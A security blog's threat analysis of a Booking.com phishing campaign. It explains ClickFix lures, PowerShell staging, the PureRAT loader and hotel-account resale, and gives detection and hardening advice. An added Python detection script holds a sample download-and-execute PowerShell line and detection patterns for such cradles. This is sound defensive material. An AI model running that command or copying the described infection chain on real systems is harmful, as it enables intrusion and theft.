The Booking.com scam labeled “I Paid Twice” is a global phishing operation that targets hotels and their guests by abusing compromised booking-management accounts. Criminals first breach hotel staff machines, harvest booking platform credentials, and then use those accounts to email or message real customers with convincing, reservation-specific fraud. Victims receive messages that look legitimate and are directed to fake payment verification pages that harvest banking details. The final goal is financial theft, account takeover, and resale of high value extranet access on underground markets.
This Botcrawl deep dive explains the complete attack chain, from the initial infection of hotel staff to the distribution of phishing pages for guests. We cover the ClickFix social engineering tactic, the PureRAT loader and payload, the criminal marketplace that monetizes Booking.com account access, detection opportunities for defenders, and practical steps hotels and guests can take right now to stop the Booking.com scam.
How the Booking.com Scam Works
The Booking.com scam is a multi-stage fraud that follows a predictable escalation. First, threat actors infect hotel administrator workstations or compromise their email accounts. Next, attackers use the stolen credentials to send realistic messages to hotel staff or to hotel guests. The messages include links that redirect through a traffic distribution network to pages impersonating Booking.com or other booking platforms. When hotel staff or guests follow the instructions on these pages they are tricked into copying and executing a PowerShell command or entering payment data on a fake checkout. The PowerShell command downloads a staged archive, installs a loader, and runs a Remote Access Trojan called PureRAT. With PureRAT on the administrator machine, attackers harvest extranet credentials, monitor reservations, and send follow up phishing messages to guests or sell access to other criminals.
Why this Booking.com Scam Is Effective
- Contextual credibility. Messages contain reservation identifiers, guest names, and booking references that make phishing attempts look legitimate.
- High value targets. Booking extranet accounts control multiple properties and large volumes of active bookings, increasing the potential payoff to attackers.
- Professionalised criminal market. The full attack chain is supported by specialised services: traffers who push traffic, sellers of booking logs, log checkers, and phishing kit operators.
- Stealthy delivery. The ClickFix tactic uses redirection and short lived domains to hide payload infrastructure and avoid takedown.
From Hotel Compromise to Guest Fraud
The Booking.com scam often starts with one infected hotel workstation. That single compromise can cascade quickly. An attacker with access to an administrator account can read reservation details, send messages from a legitimate corporate address, and create believable guest communications. Those communications in turn lead victims to phishing pages that harvest banking information or prompt dangerous commands that install malware like PureRAT.
Typical timeline of the Booking.com scam
- Initial infection through phishing, malvertising, or exploit. Attacker gains foothold on an admin workstation.
- Credentials for booking platforms are harvested and validated. Valid extranet accounts are used to send fraudulent messages or are listed for sale.
- Guests receive messages claiming a payment problem and are directed to a phishing page. At least one real victim pays again, creating the “I Paid Twice” scenario.
- PureRAT and other stealers harvest more credentials and escalate access to other properties or systems.
- Logs and working accounts are sold on criminal marketplaces. Fraud servers harvest payments and resell data.
Malicious Emails and Messaging
Attackers use multiple channels to reach hotel staff and guests. Hotel administrators receive spearphishing emails that mimic Booking.com partner notifications. Guests receive SMS or WhatsApp messages that include reservation details and a claim that a payment or verification problem must be corrected. In every case the malicious message uses real reservation data to convince the recipient the communication is genuine.
Observed subject line templates used by the Booking.com scam include:
- New last-minute booking ({REF + DATE})
- New guest message in reference to your unit Tracking code {ID}
- New guest message about reservation Tracking code {ID}
- Payment verification required for reservation Ref {ID}
These templates are efficient because they match legitimate partner messaging patterns that hotels already expect to see. That lowers suspicion and increases click rates for malicious links.
ClickFix: Social Engineering That Forces a Command
A core component of the Booking.com scam is the ClickFix social engineering method. ClickFix pages impersonate platform support or partner tools and prompt the visitor to copy a text block. The text block contains a PowerShell command that victims are told to paste into a local terminal or run as an administrative fix. The social engineering is tailored to administrative staff, often framed as an urgent site maintenance or recovery step. When executed, the PowerShell command fetches and runs additional code from an attacker controlled server.
Redirection and TDS
Links in the phishing messages do not point directly to the ClickFix page. Instead they route through a redirection network. Each URL typically matches a short random path pattern such as:
hxxps://{randomname}[.]com/[a-z0-9]{4}
Those domains are part of a traffic distribution system that hides the final ClickFix location and helps the attacker avoid simple domain blacklisting. In many cases hundreds of throwaway domains resolve to a single IP. Some domains are benign or even pornographic to distract takedown requests. The net effect of the TDS is to make the ClickFix pages resilient and transient.
How ClickFix tricks administrators
- The page uses Booking.com style and wording. It may include admin or extranet strings in the URL to add legitimacy.
- A JavaScript routine checks iframe context and forces top frame navigation, preventing containment in a frame and making the page appear in the full browser window.
- The page prompts the visitor to copy a command and paste it into PowerShell. The text is presented as a support remedy such as clearing a failed payment or reissuing a voucher.
PowerShell Execution and Payload Delivery
When an administrator follows the ClickFix instructions and executes the PowerShell snippet, a staged download chain begins. The PowerShell command fetches a second stage script from a URL path, commonly ending in /bomla. That script enumerates system information, then downloads a ZIP archive into the current user profile, typically AppData\Local. The archive contains a small executable and multiple DLLs. The script extracts the files and schedules persistence via a Run registry key and a shortcut in the Startup folder. Finally, the executable is launched. The executable then side-loads one of the bundled DLLs, which acts as a loader. That loader performs reflective assembly loading and injects PureRAT or a similar implant into memory so the payload never appears on disk.
Why PowerShell is a preferred vector
PowerShell is built into Windows systems and is designed to be flexible and scriptable. Attackers take advantage of PowerShell for several reasons. First, it can download and execute content without leaving obvious artifacts. Second, enterprise environments often allow PowerShell by default for administrative tasks. Third, scripted PowerShell commands can be copied and pasted by social engineering victims in a way that feels familiar to support staff.
PureRAT: Capabilities and Threat
PureRAT is a modular Remote Access Trojan sold as malware as a service. In campaigns connected to the Booking.com scam, PureRAT provides broad remote control and theft capabilities. Once loaded, PureRAT fingerprints the host, reports system details to C2 servers, and awaits plugin delivery. Observed PureRAT features include remote desktop control, keylogging, file collection, credential theft modules, and plugin based exfiltration pipelines. PureRAT commonly communicates with C2 over TLS to evade inspection and uses custom ports to blend with legitimate traffic.
Operational details observed in the Booking.com scam
- PureRAT is often protected with obfuscation and packing to resist static analysis.
- It uses reflective loading so the malware may never be written to disk in plain form.
- Plugin modules can be pushed on demand to locate password stores, cookies, browser data, and file system targets such as reservation exports.
- Network activity typically uses encrypted transports on high ports such as 56001, 56002, and 56003.
Monetizing the Booking.com Scam
The Booking.com scam is profitable because attackers can monetize each stage. A single compromised extranet account can be sold for hundreds to thousands of dollars depending on its value. High value accounts are those that manage multiple properties, belong to high tier partners, or have active reservations with imminent check ins. Attackers also use compromised accounts to send credible fraudulent messages to guests and extract payment information directly. Finally, harvested guest payment data and PII are sold or used for further fraud.
Services that support the criminal ecosystem
- Log markets. Compromised extranet accounts are traded as cookies or credential pairs on private markets.
- Log checkers. Tooling to validate whether stolen credentials still work and to extract metadata about accounts.
- Traffers. Specialists who deliver traffic to phishing pages through social networks, paid ads, or SEO poisoning.
- Phishing kits. Reusable landing pages hosted behind fast changing domains and Cloudflare protections to resist takedown.
Guest-Facing Fraud: The “I Paid Twice” Scheme
Guest-focused phishing pages mimic Booking.com or other booking platforms and present a believable narrative: a payment verification problem, a billing error, or a failed card capture. The phishing page displays reservation details and asks the guest to re-enter their payment information. Because these pages are often protected by anti-bot services like Cloudflare Turnstile and hosted behind legitimate infrastructure, they look authentic and bypass simple defensive checks.
In documented cases, a victim paid the hotel at check in and later received a phishing message alleging a payment verification issue. The victim followed the link and re-entered their card details on the fake page. The attacker then used the card to withdraw funds or sold card details immediately on darknet markets. That is how the Booking.com scam earned the “I Paid Twice” label.
Technical Indicators and IOCs
Defenders should monitor for the following observable patterns linked to the Booking.com scam. Use these IOCs as part of a broader hunting strategy. Note that domains and IPs change quickly, but patterns such as the use of short random redirect domains, /bomla payload paths, and ZIP archive names like updserc.zip are persistent signals.
- Redirect pattern: hxxps://{randomname}[.]com/[a-z0-9]{4}
- Payload path often ends in /bomla
- Staged archive filename patterns: updserc.zip or similar
- PowerShell download and execution calls that fetch scripts from attacker domains
- Creation of Run registry keys and .lnk shortcuts in Startup folders
- Use of AddInProcess32.exe launching from AppData or Temp paths with unexpected network connections
- Encrypted C2 connections on uncommon ports such as 56001, 56002, 56003
Sample IOCs
Below is a non exhaustive list of indicators observed in the campaign. This list can be imported into detection tooling, but teams should verify signs in their own environments before action.
Detection Opportunities for Security Teams
There are multiple detection and hunting strategies defenders can apply to identify the Booking.com scam early in the chain. Focus on PowerShell usage, unusual persistence mechanisms, and anomalies in admin account behavior.
Hunt for suspicious PowerShell activity
- Search for command lines that include remote downloads. Flag PowerShell invocations that call Invoke-Expression or that reference short lived attacker domains.
- Monitor for processes that create .lnk files in Startup or create Run registry keys. These actions often indicate scripted persistence chains.
Watch for DLL side loading and unusual AddInProcess32 activity
Because the loader abuses legitimate processes like AddInProcess32.exe, use process parent-child relationships as indicators. Alert on AddInProcess32 when its parent process originates from user profile paths such as AppData or Temp. Correlate such events with unexpected network connections or certificate store access for stronger confidence.
Network level detection
- Monitor outgoing TLS connections on uncommon ports like 56001. Compare destinations against known malicious IPs associated with PureRAT C2s.
- Use TLS server name indications, certificate anomalies, and uncommon SNI values to detect suspicious encrypted channels.
Web content and phishing detection
- Block or scrutinize short lived redirect domains and common TDS patterns. Use reputation lists to capture throwaway redirectors.
- Detect pages that ask visitors to copy and paste terminal commands. This is a high fidelity signal of ClickFix style social engineering.
- Look for pages with admin, extranet, or booking patterns in the URL path that are not hosted on legitimate Booking.com domains.
Operational Recommendations for Hotels
Hotels and property management teams are the primary frontline in preventing and detecting this Booking.com scam. These steps reduce the risk of account compromise and stop the onward phishing of guests.
- Enable Multi Factor Authentication. Enforce phishing resistant MFA for extranet and administrative accounts. FIDO2 keys are preferred.
- Harden admin endpoints. Restrict extranet administrative access by IP whitelisting and VPN only access where possible.
- Limit privileges. Apply least privilege to booking platform accounts. Avoid shared credentials and centralised admin accounts that manage multiple properties.
- Replace plain text exports. Avoid exporting full guest payment details unless absolutely necessary. Tokenize and minimize PII exposure.
- Train staff on ClickFix tactics. Educate reservation and front desk teams to never paste remote commands into PowerShell or run unknown scripts. Simulate social engineering exercises periodically.
- Monitor third party access. Review which vendors or connectors have extranet access and rotate API keys and passwords regularly.
- Record and validate vendor notifications. Establish an internal channel to verify any partner notifications before acting on them.
What Guests Should Do Right Now
Guests are the ultimate victims in the Booking.com scam. If you receive a payment verification message or any suspicious communication that references a reservation, follow these steps.
- Do not click forwarded links. Instead, open your Booking.com app or the official booking site and check your reservation from there.
- Contact the hotel directly. Call the phone number on your reservation confirmation to confirm any payment issues.
- Do not paste or run any commands. Legitimate support will never ask you to run a PowerShell command to fix a booking.
- Monitor bank accounts. Check card statements for unauthorized charges and report suspicious transactions immediately.
- Run an antivirus scan. If you believe you clicked a phishing link, run a full system scan with Malwarebytes to check for potential credential stealing malware.
How Law Enforcement and Platform Operators Should Respond
Platform operators and law enforcement have complementary roles in disrupting the Booking.com scam. Booking platforms must accelerate takedown of phishing pages and close compromised extranet accounts. Law enforcement should prioritize high value sellers of extranet logs and traffer groups.
- Rapid takedown. Coordinate with hosting providers and CDNs to remove phishing pages. Use domain registrars and abuse contacts to eliminate infrastructure used for ClickFix and guest phishing.
- Freeze high value accounts. When logs indicate active fraud, freeze accounts managing multiple reservations and require reauthentication and verification.
- Trace sellers and buyers. Investigate marketplaces and Telegram bots that automate log purchases. Disrupt the economy that funds these campaigns.
- Share indicators. Publish IoCs, redirection patterns, and payload hashes across CERTs and industry ISACs to help rapid detection and blocking.
Why the Booking.com Scam Will Continue Unless Disrupted
The Booking.com scam is profitable and low risk for attackers. The criminal market supplies tools and services that remove technical barriers, and the TDS approach protects infrastructure from takedown. Unless the criminal supply chain is disrupted, attackers will keep scaling the same model against other booking sites and travel partners. Payment card harvesting and credential resale remain lucrative, and every compromised extranet account can be monetized many times over.
Case Studies and Real World Impact
Investigations show multiple hotels in different regions reporting guest fraud and duplicated payments. In one verified case, a guest paid at check in and later also paid via a phishing page after receiving a WhatsApp message that included their reservation details. The attacker used the card twice within hours. The affected guest had to dispute the charges and cancel a credit card. The hotel lost customer trust and faced follow up inquiries from payment processors. That example illustrates how the Booking.com scam damages both guests and hotels.
Threat Hunting Playbook
Security teams looking to hunt this activity should combine host, network and email signal correlation. The following playbook offers practical steps to find signs of the Booking.com scam in enterprise environments.
- Email telemetry. Search mail logs for messages leaving from partner facing addresses that include booking patterns but lack expected headers or DKIM signatures.
- PowerShell history. Inspect PowerShell execution logs for commands that fetch remote scripts from short lived domains or that reference /bomla paths.
- Startup artifacts. Hunt for new .lnk files created in Startup locations and for Run registry keys created within a narrow time window.
- Process parent anomalies. Detect AddInProcess32.exe running under unusual parents such as AppData\Local\Temp locations.
- Network anomalies. Flag TLS connections to IPs that were not previously contacted, especially on ports linked to PureRAT C2s.
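As an added example (not code from Botcrawl or the original article), the following Python script turns the host and network signals from the Detection Opportunities section and this playbook into rules, runs them over a few constructed telemetry lines, and escalates a host only when several stages of the chain coincide. The "source|key=value" export format, the host names, example.com, the 203.0.113.x addresses, and the updserc folder name are all assumptions made for the example.

```python
import re
from collections import defaultdict

# Constructed sample telemetry (not data from the real campaign). Each line is
# "source|key=value|..." from a hypothetical EDR export; "host" ties events together.
SAMPLE_EVENTS = [
    "url|host=FD-01|url=https://example.com/q7x2",
    'process|host=FD-01|image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'
    '|parent=C:\\Windows\\explorer.exe|cmd=powershell -c "iex (iwr https://example.com/bomla)"',
    "registry|host=FD-01|key=HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"
    "|data=C:\\Users\\alice\\AppData\\Local\\updserc\\launcher.exe",
    "file|host=FD-01|path=C:\\Users\\alice\\AppData\\Roaming\\Microsoft\\Windows"
    "\\Start Menu\\Programs\\Startup\\updserc.lnk",
    "process|host=FD-01|image=C:\\Users\\alice\\AppData\\Local\\updserc\\AddInProcess32.exe"
    "|parent=C:\\Users\\alice\\AppData\\Local\\updserc\\launcher.exe|cmd=AddInProcess32.exe",
    "network|host=FD-01|image=C:\\Users\\alice\\AppData\\Local\\updserc\\AddInProcess32.exe"
    "|dst=203.0.113.10|dport=56001",
    # Benign noise on a second host: the .NET-shipped AddInProcess32 under Visual Studio.
    "process|host=DEV-07|image=C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AddInProcess32.exe"
    "|parent=C:\\Program Files\\Microsoft Visual Studio\\devenv.exe|cmd=AddInProcess32.exe",
    "network|host=DEV-07|image=C:\\Program Files\\Mozilla Firefox\\firefox.exe|dst=203.0.113.20|dport=443",
]

TDS_REDIRECT = re.compile(r"^https?://[a-z0-9-]+\.com/[a-z0-9]{4}$", re.I)  # {randomname}.com/xxxx
DOWNLOAD_CRADLE = re.compile(r"\b(iex|invoke-expression|iwr|invoke-webrequest|downloadstring)\b", re.I)
USER_WRITABLE = re.compile(r"\\(AppData|Temp)\\", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run$", re.I)
STARTUP_LNK = re.compile(r"\\Startup\\[^\\]+\.lnk$", re.I)
PURERAT_PORTS = {56001, 56002, 56003}

def parse(line):
    """Split one 'source|k=v|k=v' telemetry line into a dict."""
    source, *fields = line.split("|")
    event = {"source": source}
    for field in fields:
        key, _, value = field.partition("=")
        event[key] = value
    return event

def classify(event):
    """Return the playbook rules that a single parsed event matches."""
    hits, src, image = [], event["source"], event.get("image", "")
    if src == "url" and TDS_REDIRECT.match(event.get("url", "")):
        hits.append("tds_redirect_pattern")
    elif src == "process":
        cmd = event.get("cmd", "")
        if image.lower().endswith("powershell.exe") and DOWNLOAD_CRADLE.search(cmd):
            hits.append("powershell_download_cradle")
        if "/bomla" in cmd.lower():
            hits.append("bomla_payload_path")
        # Parent or image under AppData/Temp is the side-loading signal, not the binary name alone.
        if image.lower().endswith("addinprocess32.exe") and USER_WRITABLE.search(image + event.get("parent", "")):
            hits.append("addinprocess32_user_path")
    elif src == "registry":
        if RUN_KEY.search(event.get("key", "")) and USER_WRITABLE.search(event.get("data", "")):
            hits.append("run_key_user_path")
    elif src == "file" and STARTUP_LNK.search(event.get("path", "")):
        hits.append("startup_lnk")
    elif src == "network" and int(event.get("dport", 0)) in PURERAT_PORTS:
        hits.append("c2_port")
    return hits

def hunt(lines, escalate_at=3):
    """Group distinct rule hits per host. A host matching >= escalate_at different
    stages looks like the ClickFix -> PowerShell -> persistence -> C2 chain, not noise."""
    per_host = defaultdict(set)
    for line in lines:
        event = parse(line)
        per_host[event.get("host", "unknown")].update(classify(event))
    return {host: (sorted(rules), len(rules) >= escalate_at) for host, rules in per_host.items()}

if __name__ == "__main__":
    for host, (rules, escalated) in hunt(SAMPLE_EVENTS).items():
        print(f"{host}: {'ESCALATE' if escalated else 'ok'} {rules}")
```

Feed it real exports by mapping your EDR fields onto the same keys; the per-host grouping is what separates a developer's legitimate AddInProcess32 from a loader that also left a Run key and a connection on 56001.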
Hardening and Prevention Checklist
Use this checklist to reduce the attack surface that fuels the Booking.com scam.
- Apply least privilege and role based access controls to extranet accounts.
- Enforce phishing resistant MFA for all partner and admin accounts.
- Disable or restrict PowerShell usage for non administrative users. Apply constrained language mode where possible.
- Implement endpoint detection that watches for Run key creation, Startup shortcuts, and DLL side loading patterns.
- Monitor web traffic patterns and block known TDS redirect hosts.
- Train reservation staff to verify partner requests out of band and to report suspicious messages.
- Rotate API keys and passwords after any confirmed compromise and audit vendor access regularly.
Final Notes on the Booking.com Scam
The Booking.com scam is a commercialised criminal operation backed by a mature underground ecosystem. It combines social engineering, commodity malware, and specialised services to turn a single compromise into repeated profit. Hotels must treat their extranet accounts like crown jewels. Guests must treat unexpected payment verification requests with skepticism. Platform operators and law enforcement must target the marketplaces and traffer groups that keep this model profitable.
Botcrawl will continue to monitor the Booking.com scam and publish updates as new infrastructure and IoCs appear. If your organization needs help hunting this activity or validating indicators in your environment, contact our incident response team for guidance.
Extended IoCs and Notes
Below are the IoCs from the documented campaigns. As always these indicators change quickly. Use them as starting points for hunting and validation.
If you use these IoCs, add them to a watchlist and correlate across email, proxy, endpoint, and DNS logs. Prioritize any hits that appear during the same time window as suspicious PowerShell activity or unusual AddInProcess32 behavior.
Resources and Reporting
If you or your hotel has been targeted by this Booking.com scam, take these steps immediately: change all booking platform credentials, enforce MFA, run a full endpoint assessment, and contact your booking platform account manager. Report the phishing pages to the hosting provider and to your national CERT. If you need forensic support Botcrawl provides incident response and hunting services tailored to hospitality sector threats.
For consumer protection, if you were defrauded through a Booking.com related phishing page, contact your bank and file a dispute. Report the fraud to local law enforcement and to your national cybercrime reporting agency.
Stay informed on Booking.com scam updates and broader travel sector threats at Botcrawl scam alerts and Botcrawl cybersecurity.
Thank you for reading. If you have IoCs, suspicious landing pages, or samples you want us to analyze, contact our team and we will prioritize it for detection and disclosure.
Sean Doyle
Sean is a tech author and security researcher with more than 20 years of experience in cybersecurity, privacy, malware analysis, analytics, and online marketing. He focuses on clear reporting, deep technical investigation, and practical guidance that helps readers stay safe in a fast-moving digital landscape. His work continues to appear in respected publications, including articles written for Private Internet Access. Through Botcrawl and his ongoing cybersecurity coverage, Sean provides trusted insights on data breaches, malware threats, and online safety for individuals and businesses worldwide.